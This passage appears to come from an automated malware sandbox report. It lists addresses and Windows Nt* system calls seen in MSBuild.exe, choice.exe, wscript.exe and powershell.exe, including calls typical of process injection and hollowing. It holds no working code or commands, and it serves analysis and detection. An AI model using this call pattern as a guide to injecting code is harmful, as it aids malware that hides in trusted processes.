                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2AF0 NtWriteFile,9_2_013D2AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2AD0 NtReadFile,9_2_013D2AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2D30 NtUnmapViewOfSection,9_2_013D2D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2D10 NtMapViewOfSection,9_2_013D2D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2D00 NtSetInformationFile,9_2_013D2D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2DB0 NtEnumerateKey,9_2_013D2DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2DD0 NtDelayExecution,9_2_013D2DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2C00 NtQueryInformationProcess,9_2_013D2C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2C60 NtCreateKey,9_2_013D2C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2CF0 NtOpenProcess,9_2_013D2CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2CC0 NtQueryVirtualMemory,9_2_013D2CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2F30 NtCreateSection,9_2_013D2F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2F60 NtCreateProcessEx,9_2_013D2F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2FB0 NtResumeThread,9_2_013D2FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2FA0 NtQuerySection,9_2_013D2FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2FE0 NtCreateFile,9_2_013D2FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2E30 NtWriteVirtualMemory,9_2_013D2E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2EA0 NtAdjustPrivilegesToken,9_2_013D2EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2E80 NtReadVirtualMemory,9_2_013D2E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2EE0 NtQueueApcThread,9_2_013D2EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D3010 NtOpenDirectoryObject,9_2_013D3010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D3090 NtSetValueKey,9_2_013D3090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D39B0 NtGetContextThread,9_2_013D39B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D3D10 NtOpenProcessToken,9_2_013D3D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D3D70 NtOpenThread,9_2_013D3D70
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_04A52CA0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52C60 NtCreateKey,LdrInitializeThunk,10_2_04A52C60
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04A52C70
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_04A52DF0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52DD0 NtDelayExecution,LdrInitializeThunk,10_2_04A52DD0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52D10 NtMapViewOfSection,LdrInitializeThunk,10_2_04A52D10
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52FE0 NtCreateFile,LdrInitializeThunk,10_2_04A52FE0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52F30 NtCreateSection,LdrInitializeThunk,10_2_04A52F30
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52AF0 NtWriteFile,LdrInitializeThunk,10_2_04A52AF0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52AD0 NtReadFile,LdrInitializeThunk,10_2_04A52AD0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_04A52BA0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52BE0 NtQueryValueKey,LdrInitializeThunk,10_2_04A52BE0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04A52BF0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52B60 NtClose,LdrInitializeThunk,10_2_04A52B60
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A535C0 NtCreateMutant,LdrInitializeThunk,10_2_04A535C0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A54650 NtSuspendThread,10_2_04A54650
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A54340 NtSetContextThread,10_2_04A54340
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52CF0 NtOpenProcess,10_2_04A52CF0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52CC0 NtQueryVirtualMemory,10_2_04A52CC0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52C00 NtQueryInformationProcess,10_2_04A52C00
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52DB0 NtEnumerateKey,10_2_04A52DB0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52D30 NtUnmapViewOfSection,10_2_04A52D30
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52D00 NtSetInformationFile,10_2_04A52D00
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52EA0 NtAdjustPrivilegesToken,10_2_04A52EA0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52E80 NtReadVirtualMemory,10_2_04A52E80
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52EE0 NtQueueApcThread,10_2_04A52EE0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52E30 NtWriteVirtualMemory,10_2_04A52E30
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52FA0 NtQuerySection,10_2_04A52FA0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52FB0 NtResumeThread,10_2_04A52FB0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52F90 NtProtectVirtualMemory,10_2_04A52F90
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52F60 NtCreateProcessEx,10_2_04A52F60
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52AB0 NtWaitForSingleObject,10_2_04A52AB0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A52B80 NtQueryInformationFile,10_2_04A52B80
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A53090 NtSetValueKey,10_2_04A53090
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A53010 NtOpenDirectoryObject,10_2_04A53010
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A53D10 NtOpenProcessToken,10_2_04A53D10
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A53D70 NtOpenThread,10_2_04A53D70
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A539B0 NtGetContextThread,10_2_04A539B0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B29760 NtReadFile,10_2_02B29760
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B295F0 NtCreateFile,10_2_02B295F0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B29A70 NtAllocateVirtualMemory,10_2_02B29A70
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B29860 NtDeleteFile,10_2_02B29860
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B29910 NtClose,10_2_02B29910
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048D4488 NtMapViewOfSection,10_2_048D4488
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048D3429 NtSetContextThread,10_2_048D3429
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048D3749 NtSuspendThread,10_2_048D3749
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048D3D8D NtQueueApcThread,10_2_048D3D8D
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048D4851 NtUnmapViewOfSection,10_2_048D4851
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048D3A69 NtResumeThread,10_2_048D3A69
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D60CEE0_2_02D60CEE
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D5A0B60_2_02D5A0B6
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D591820_2_02D59182
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D59D210_2_02D59D21
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C2B6B80_2_0000023761C2B6B8
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C2C2570_2_0000023761C2C257
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C332240_2_0000023761C33224
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C2C5EC0_2_0000023761C2C5EC
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B4316C93_2_00007FFD9B4316C9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B430BE23_2_00007FFD9B430BE2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004189B39_2_004189B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0042F1039_2_0042F103
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004101D39_2_004101D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00402AC69_2_00402AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00402AD09_2_00402AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040437B9_2_0040437B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00416BC39_2_00416BC3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040E3DA9_2_0040E3DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040E3E39_2_0040E3E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004103F39_2_004103F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004023969_2_00402396
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004023A09_2_004023A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00416BBE9_2_00416BBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040E5289_2_0040E528
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040E5339_2_0040E533
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00402F769_2_00402F76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00402F809_2_00402F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014281589_2_01428158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013901009_2_01390100
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143A1189_2_0143A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014581CC9_2_014581CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014541A29_2_014541A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014601AA9_2_014601AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014320009_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145A3529_2_0145A352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014603E69_2_014603E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE3F09_2_013AE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014402749_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014202C09_2_014202C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A05359_2_013A0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014605919_2_01460591
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014524469_2_01452446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014444209_2_01444420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144E4F69_2_0144E4F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A07709_2_013A0770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C47509_2_013C4750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139C7C09_2_0139C7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BC6E09_2_013BC6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B69629_2_013B6962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A29A09_2_013A29A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0146A9A69_2_0146A9A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AA8409_2_013AA840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A28409_2_013A2840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013868B89_2_013868B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE8F09_2_013CE8F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145AB409_2_0145AB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01456BD79_2_01456BD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA809_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AAD009_2_013AAD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143CD1F9_2_0143CD1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B8DBF9_2_013B8DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139ADE09_2_0139ADE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0C009_2_013A0C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01390CF29_2_01390CF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440CB59_2_01440CB5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01414F409_2_01414F40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C0F309_2_013C0F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013E2F289_2_013E2F28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01442F309_2_01442F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141EFA09_2_0141EFA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01392FC89_2_01392FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0E599_2_013A0E59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145EE269_2_0145EE26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145EEDB9_2_0145EEDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B2E909_2_013B2E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145CE939_2_0145CE93
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0146B16B9_2_0146B16B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138F1729_2_0138F172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D516C9_2_013D516C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AB1B09_2_013AB1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144F0CC9_2_0144F0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145F0E09_2_0145F0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014570E99_2_014570E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A70C09_2_013A70C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145132D9_2_0145132D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138D34C9_2_0138D34C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013E739A9_2_013E739A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A52A09_2_013A52A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014412ED9_2_014412ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BD2F09_2_013BD2F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BB2C09_2_013BB2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014575719_2_01457571
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014695C39_2_014695C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143D5B09_2_0143D5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013914609_2_01391460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145F43F9_2_0145F43F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145F7B09_2_0145F7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013E56309_2_013E5630
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014516CC9_2_014516CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014359109_2_01435910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A99509_2_013A9950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BB9509_2_013BB950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140D8009_2_0140D800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A38E09_2_013A38E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145FB769_2_0145FB76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01415BF09_2_01415BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BFB809_2_013BFB80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013DDBF99_2_013DDBF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01457A469_2_01457A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145FA499_2_0145FA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01413A6C9_2_01413A6C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144DAC69_2_0144DAC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013E5AA09_2_013E5AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01441AA39_2_01441AA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143DAAC9_2_0143DAAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01451D5A9_2_01451D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01457D739_2_01457D73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A3D409_2_013A3D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BFDC09_2_013BFDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01419C329_2_01419C32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145FCF29_2_0145FCF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145FF099_2_0145FF09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A1F929_2_013A1F92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01363FD59_2_01363FD5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01363FD29_2_01363FD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145FFB19_2_0145FFB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A9EB09_2_013A9EB0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ACE4F610_2_04ACE4F6
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AC442010_2_04AC4420
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD244610_2_04AD2446
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AE059110_2_04AE0591
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2053510_2_04A20535
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A3C6E010_2_04A3C6E0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A1C7C010_2_04A1C7C0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2077010_2_04A20770
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A4475010_2_04A44750
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AB200010_2_04AB2000
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AE01AA10_2_04AE01AA
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD41A210_2_04AD41A2
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD81CC10_2_04AD81CC
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A1010010_2_04A10100
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ABA11810_2_04ABA118
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AA815810_2_04AA8158
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AA02C010_2_04AA02C0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AC027410_2_04AC0274
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AE03E610_2_04AE03E6
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2E3F010_2_04A2E3F0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADA35210_2_04ADA352
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AC0CB510_2_04AC0CB5
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A10CF210_2_04A10CF2
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A20C0010_2_04A20C00
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A38DBF10_2_04A38DBF
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A1ADE010_2_04A1ADE0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2AD0010_2_04A2AD00
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ABCD1F10_2_04ABCD1F
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A32E9010_2_04A32E90
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADCE9310_2_04ADCE93
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADEEDB10_2_04ADEEDB
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADEE2610_2_04ADEE26
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A20E5910_2_04A20E59
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A9EFA010_2_04A9EFA0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A12FC810_2_04A12FC8
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A62F2810_2_04A62F28
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A40F3010_2_04A40F30
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AC2F3010_2_04AC2F30
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A94F4010_2_04A94F40
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A068B810_2_04A068B8
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A4E8F010_2_04A4E8F0
